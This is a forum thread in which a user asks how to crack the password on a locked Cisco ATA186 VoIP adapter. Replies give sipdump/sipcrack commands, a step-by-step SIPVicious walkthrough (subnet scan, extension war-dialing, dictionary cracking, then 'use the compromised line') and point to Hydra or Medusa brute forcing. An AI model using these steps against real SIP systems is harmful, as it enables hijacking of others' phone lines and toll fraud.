No documentation on SIPCRACK or am I using it wrongly?

[licensedtoquill]

Sorry to be such a newbie but I am really uncomfortable with command lines in Linux: I have only used one successfully before on ONE occasion, I once successfully ran ndiswrapper

Some bum sold me a SIP locked to his VoIP provider or stolen from them, I cant figure out which and the manufacturer won't help me. (nor would Paypal who seemingly couldnt care less about users conning people or users selling stolen items using Paypal)

So I am stuck with this locked SIP and saw the reference to SIPCRACK. I assume this is what the application is for?

I have connected up a fresh computer with some old hard drives in it and booted off the CD to a desktop with the SIP connected to the (only) MoBo LAN socket. I havent bothered connecting up the telephone to the SIP yet, nor managed to get a WiFi connection with my MA111 which the CD doesnt seem to recognise; but it seems to me that I dont need to have an internet connection to use SIPCRACK?

With only one 'ethernet' connection, I assume SIPCRACK needs to look at eth0? If it isnt, I cant quite figure out how to establish where it is to put the location into the command line? I tried opening a KDE Console but it just gives lists of potential ethernet connections without telling me which one the SIP is at or how to identify it

I am not sure what SIPDUMP is but surely if I can run SIPCRACK with the correct command line, it should put a million passwords a second through the SIP until it finds the password and then write it to (the hard drive?) as the dumped file??

So I took the plunge and typed in sipdump -i eth0 logins.dump (of which it didnt SEEM TO like eth0) and then sipcrack -w mywordlist.txt logins.dump which it also didnt seem to like. Presumably as the SIPDUMP command didnt execute properly

Can anyone advise how to identify the SIP or what it was that I did wrong of all the myriad things I probably did do wrongly please?

Or is SIPCRACK only for identifying the password on a working SIP such as one installed by Vonage, - so that you can unlock the RTP300 by knowing the password and then use the second line for another VoIP operator?

[Archangel-Amael]

With your freakin small arse font size I couldn't read your post very well. But by the title is seems you are looking for documentation.

Google's first hit gives us the home of sipcrack right over at remote exploit
http://www.remote-exploit.org/codes_sipcrack.html

If you need more help hit me back and please use a normal font and I will try and help you.

[licensedtoquill]

With your freakin small arse font size I couldn't read your post very well. But by the title is seems you are looking for documentation.

Google's first hit gives us the home of sipcrack right over at remote exploit remote-exploit.org/codes_sipcrack.htm

If you need more help hit me back and please use a normal font and I will try and help you.

Yes, that was where I got the commands I entered: What I was trying to figure out was what I was doing wrong? Sorry for the font size which I thought was normal. let me put the type size larger

I have connected up a fresh computer with some old hard drives in it and booted off the CD to a desktop with the SIP connected to the (only) MoBo LAN socket. I havent bothered connecting up the telephone to the SIP yet, nor managed to get a WiFi connection with my MA111 which the CD doesnt seem to recognise; but it seems to me that I dont need to have an internet connection to use SIPCRACK?

With only one 'ethernet' connection, I assume SIPCRACK needs to look at eth0? If it isnt, I cant quite figure out how to establish where it is to put the location into the command line? I tried opening a KDE Console but it just gives lists of potential ethernet connections without telling me which one the SIP is at or how to identify it

I am not sure what SIPDUMP is but surely if I can run SIPCRACK with the correct command line, it should put a million passwords a second through the SIP until it finds the password and then write it to (the hard drive?) as the dumped file??

So I took the plunge and typed in sipdump -i eth0 logins.dump (of which it didnt SEEM TO like eth0) and then sipcrack -w mywordlist.txt logins.dump which it also didnt seem to like. Presumably as the SIPDUMP command didnt execute properly

Can anyone advise how to identify the SIP or what it was that I did wrong of all the myriad things I probably did do wrongly please?

Or is SIPCRACK only for identifying the password on a working SIP such as one installed by Vonage, - so that you can unlock the RTP300 by knowing the password and then use the second line for another VoIP operator?

MOD EDIT: JUST USE THE DEFAULT FONT AND NOBODY WILL HAVE A PROBLEM.
USING THE HUGE FONT YOU HAD BEFORE THE EDIT JUST MAKES YOUR POST VERY BIG AND VERY LIKELY TO BE IGNORED.

[Archangel-Amael]

Yes, that was where I got the commands I entered: What I was trying to figure out was what I was doing wrong? Sorry for the font size which I thought was normal. let me put the type size larger

Just use the default and it will be ok.

I have connected up a fresh computer with some old hard drives in it and booted off the CD to a desktop with the SIP connected to the (only) MoBo LAN socket. I havent bothered connecting up the telephone to the SIP yet, nor managed to get a WiFi connection with my MA111 which the CD doesnt seem to recognise; but it seems to me that I dont need to have an internet connection to use SIPCRACK?

You may not need a internet connection in order to test on a local network. However if you could not ping some website how do you know that you can even transmit or receive on the local network?

With only one 'ethernet' connection, I assume SIPCRACK needs to look at eth0? If it isnt, I cant quite figure out how to establish where it is to put the location into the command line? I tried opening a KDE Console but it just gives lists of potential ethernet connections without telling me which one the SIP is at or how to identify it

The app needs to know which NIC card to use in order to transmit or receive information from. Generally speaking in linux terms eth0 is the first connected or recognized ethernet card. This can be changed however that is a different subject. What location are you looking to put in a command line? Again generally the device that one wants to use goes toward the beginning of a command but not always. As for KDE or Konsole this has nothing to do with the tool, which is a command line tool. So realistically one might not even need to have KDE installed.

As for finding where a SIP is at that does not seem right either. SIP is a Protocol and not something that you would normally see. SIP is a means to allow initiation modification and termination of an interactive user session.
So as for identifying it in Konsole is most likely not going to happen.

I am not sure what SIPDUMP is but surely if I can run SIPCRACK with the correct command line, it should put a million passwords a second through the SIP until it finds the password and then write it to (the hard drive?) as the dumped file??

If you do not know what the tool is or is used for it might stand to reason to learn about it and what it can do before you do something that you don't want to (i.e. mess up a computer, get in trouble with your isp or break the law) I am not saying to not use the tool but you might wanna read more about it and the protocols.

So I took the plunge and typed in sipdump -i eth0 logins.dump (of which it didnt SEEM TO like eth0) and then sipcrack -w mywordlist.txt logins.dump which it also didnt seem to like. Presumably as the SIPDUMP command didnt execute properly

How do you know it did not execute properly? Was there something that told you this ? Are you sure that you have the right syntax and target's specified? More info is needed.

Or is SIPCRACK only for identifying the password on a working SIP such as one installed by Vonage, - so that you can unlock the RTP300 by knowing the password and then use the second line for another VoIP operator

As taken from the page referenced earlier,
"SIPcrack is a SIP login sniffer/cracker that contains 2 programs: sipdump to capture the digest authentication

If you would like you can have a look at these two threads I have posted on using a newer tool that has more support. The first one is on using SIPVicious.
The second one is on setting up a vmware of a trixbox which is a PBX that supports SIP and VOIP. This will give you the chance to not only learn about the tools, but also on how they can be used against your networks.

[licensedtoquill]

"What location are you looking to put in a command line?"

The thing I call a SIP.

"As for finding where a SIP is at that does not seem right either. SIP is a Protocol and not something that you would normally see. SIP is a means to allow initiation modification and termination of an interactive user session."

I call the box which transmutes the ethernet signal into a telephone one a SIP: If this is wrong, tell me what my Cisco box is and I will repost using your word.
"So as for identifying it in Konsole is most likely not going to happen". So how DO I identify what the system see what I call a SIP as? So that I can put it into the command line.


"If you do not know what the tool is or is used for it might stand to reason to learn about it and what it can do before you do something that you don't want to (i.e. mess up a computer, get in trouble with your isp or break the law) I am not saying to not use the tool but you might wanna read more about it and the protocols".

I agree this is a bit difficult where the person who wrote the software doesnt want to support it and I say I have already read and acted on the explanation page he DOES let slip onto the internet

"How do you know it did not execute properly?" It told me that the 'thing' I was trying to crack was not at ETH0 "Was there something that told you this ?" "Are you sure that you have the right syntax and target's specified? More info is needed".

We are going around in circles. I posted precisely because something not only told me this, it also told me the part of the command line which was wrong, it was ETH0

If I cant use SIPCRACK, can I use SIPVicious to plug millions of passwords into the thing I call a SIP until it finds the password? (BTW PLEASE dont use this opportunity to tell me again that this thing isnt called a SIP. I will use any word you like to identify this box).


I dont THINK I need to learn about setting up a vmware of a trixbox or use a PBX that supports SIP and VOIP.

I would like to learn about the tools, but only so far as to know how to crack a password on my electronic box I am trying to use to convert the Ethernet signal into an (RS232?) VoIP one, not how they can be used against networks.

[licensedtoquill]

oh and one other thing: Is there some command line I can use with SIPCRACK (or indeed SIPVICIOUS) to get it to plug millions of passwords into my Cisco ATA186 if I know the MAC address of the unit I am trying to crack?

[Archangel-Amael]

Check this out you have a cisco sip box you want to crack the password of
well since you can't seem to get it with sipcrack try this instead with sipvicious.
SipVicious can identify SIP devices and PBX servers on default and non-default ports.

Code:

#./svmap 1.1.1.1/24

This will scan a range of ip's or you can modify it for your needs see the man page or my tutorial video for more info.
Next the output will show you any and all SIP devices or PBX servers.
If None are found and you know that they should exist then A. The PBX is immune to your scans, doubtful but it might be. Or B. The syntax needs to be changed.
You might need to use the -m flag. Most devices support the OPTION method but some do not so in that case you may need to use the REGISTER or INVITE methods. Now do note that the INVITE can cause a "ring" on the other end.
Once you have mapped the PBX then you can move to SvWar to find the extensions on the PBX SvWar is basically a war dialer for SIP lines.
Again see the man page for more info on usage flags.
example would look like:

Code:

#./svwar 10.0.0.1

Once you have mapped out the extensions from your PBX mapping then you can move to crack the passwords of the lines, using SvCrack.

Now you should have both the mapping and the extensions for the host or ip block or whatever. Now we can begin to crack the passwords for the users. Now this type of password cracking is like other types of cracking.
It may take a long time and not be worth while.
SvCrack makes use of digest authentication. It can crack both registrars and proxy servers.
So for example usage

Code:

#./svcrack.py 10.0.0.1 -u 192 -d dictionary.txt

The - u flag is for the extension you mapped earlier with svwar.
The -d of course is the dictionary
it can be named anything and of course you can specify the location of the dictionary using stdin.
The password once cracked will show in the terminal like so.

Code:

Extension|Password
192you@ |  passw0rd
sipphone |  sipvicious]$

After you have cracked the password you can then move to use the compromised line.

As for not using the tutorials I have posted that is your choice but I will say this finding and cracking PBX's is about as simple as cracking wep in wireless. So if you take the time to have a look at it you may find the answers you are seeking.

As for cisco and vonage they are two different ways of doing business.
The do not use the same protocols.
Another hint on vonage is that it maintains two IP address at all times for communications.

Good luck and if you get stuck on it post back, and I will try to help you further along. But please take your time and do all of the reading that you can. I will only show you general usage and nothing specific to your case because I am not going to post anything that may be considered illegal.

EDIT: Also in BT3 Final there are a boat load of SIP tools included so it may pay to have a look at them as well.
I plan on getting some tutorials up on their usage time permitting.

[Thorn]

I call the box which transmutes the ethernet signal into a telephone one a SIP: If this is wrong, tell me what my Cisco box is and I will repost using your word.

The Cisco ATA 186 is a handset-to-Ethernet adapter or converter that turns traditional telephone devices into VoIP devices. The protocols it supports are SIP (RFC 2543) and CCP.

I would like to learn about the tools, but only so far as to know how to crack a password on my electronic box I am trying to use to convert the Ethernet signal into an (RS232?) VoIP one, not how they can be used against networks.

I may be wrong about this since I've not used either tool, but I believe that SIPCRACK and SIPDUMP are for capturing and decoding the SIP packets on the network. From the sounds of the prior posts, it appears that you need to examine the configuration of the Cisco ATA 186 adapter.

According to the data sheet, the Cisco ATA 186 adapter supports configuration via HTTP (in other words it has a built-in web interface for configuring it.) Have you attempted to gain access to that interface? If you have, and that is what is locked, then I suggest that you:

a) Look for documentation on the Cisco ATA 186, as it may be locked with a default administrator account and password, and

b) If the default account/passwords don't work, look at a brute force password tool such as Hydra or Medusa.

EDIT:
The web page on setting up the ATA 186 is on this page. That page also includes procedures for resetting the ATT 186 to the factory settings.